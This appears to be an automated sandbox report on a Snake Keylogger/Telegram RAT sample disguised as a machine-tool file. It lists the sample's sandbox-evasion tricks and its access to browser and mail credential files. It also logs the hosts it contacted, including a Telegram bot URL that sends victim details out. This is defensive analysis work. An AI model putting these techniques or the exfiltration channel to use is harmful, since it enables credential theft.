Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Creates processes with suspicious names
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exe
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API/Special instruction interceptor: Address: 6242F29
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API/Special instruction interceptor: Address: 2A72F29
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 361E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 36130000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 600000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API coverage: 0.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00406001 FindFirstFileA,FindClose, 0_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00406001 FindFirstFileA,FindClose, 11_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00402688 FindFirstFileA, 11_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 11_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 600000 Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00401751 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA, 0_2_00401751
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Enables debug privileges
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405D1F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.80.46
 drive.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
142.250.65.225
 drive.usercontent.google.com United States
15169 GOOGLEUS false
172.67.177.134
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.80.46 true
drive.usercontent.google.com 142.250.65.225 true
reallyfreegeoip.org 172.67.177.134 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
      		unknown
      https://reallyfreegeoip.org/xml/191.96.150.187 false
        		unknown